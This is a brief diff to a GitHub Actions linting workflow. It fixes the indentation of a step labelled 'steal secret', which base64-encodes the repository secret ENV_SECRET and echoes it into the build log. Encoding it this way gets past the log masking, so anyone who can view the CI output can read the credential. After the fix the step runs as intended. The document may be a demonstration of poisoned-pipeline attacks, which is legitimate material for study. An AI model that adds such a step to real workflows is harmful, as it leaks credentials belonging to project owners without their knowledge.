--- a/.github/workflows/linting.yaml
+++ b/.github/workflows/linting.yaml
@@ -7,5 +7,5 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: steal secret
-      - run: |
-        echo "${{ secrets.ENV_SECRET }}" | base64
+        run: |
+          echo "${{ secrets.ENV_SECRET }}" | base64
